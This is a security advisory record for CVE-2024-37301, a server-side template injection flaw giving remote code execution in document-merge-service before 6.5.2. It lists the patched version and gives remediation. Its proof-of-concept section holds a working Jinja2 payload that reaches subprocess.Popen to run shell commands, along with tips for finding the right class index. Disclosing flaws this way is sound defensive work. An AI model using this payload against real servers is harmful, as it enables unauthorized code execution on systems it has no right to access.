---
id: CVE-2024-37301
aliases:
  - GHSA-v5gf-r78h-55q6
  - PYSEC-2026-1314
title: >-
  document-merge-service vulnerable to Remote Code Execution via Server-Side
  Template Injection
summary: >-
  document-merge-service vulnerable to Remote Code Execution via Server-Side
  Template Injection
severity: high
cvss: 7.2
cvssVector: 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'
vendor: document-merge-service
product: document-merge-service
ecosystem: pip
affected:
  - document-merge-service < 6.5.2
patched:
  - document-merge-service 6.5.2
published: '2024-06-11'
updated: '2026-07-07'
source: OSV
sourceUrl: 'https://osv.dev/vulnerability/GHSA-v5gf-r78h-55q6'
references:
  - url: >-
      https://github.com/adfinis/document-merge-service/security/advisories/GHSA-v5gf-r78h-55q6
  - url: 'https://nvd.nist.gov/vuln/detail/CVE-2024-37301'
  - url: >-
      https://github.com/adfinis/document-merge-service/commit/a1edd39d33d1bdf75c31ea01c317547be90ca074
  - url: 'https://github.com/adfinis/document-merge-service'
tags:
  - osv
  - pip
epss: 0.0104
epssPercentile: 0.62493
ingestedAt: '2026-07-08T18:25:53.083Z'
---

## Overview

### Impact
_What kind of vulnerability is it? Who is impacted?_

A remote code execution (RCE) via server-side template injection (SSTI) allows for user supplied code to be executed in the server's context where it is executed as the document-merge-server user with the UID 901 thus giving an attacker considerable control over the container.

### Patches
_Has the problem been patched? What versions should users upgrade to?_

It has been patched in v6.5.2

### References
_Are there any links users can visit to find out more?_

- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

### POC

Add the following to a document, upload and render it:

```jinja2
{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} 
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}

whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}

uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}

{% endif %}
```

The index might be different, so to debug this first render a template with `{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}` and then get the index of `subprocess.Popen` and replace 202 with that.

![image](https://github.com/adfinis/document-merge-service/assets/110528300/0a1dfcff-2eba-40f1-af9c-08c8ec2bc0a1)

## Affected packages

- `document-merge-service < 6.5.2`

## Remediation

Upgrade to a patched release:

- `document-merge-service 6.5.2`
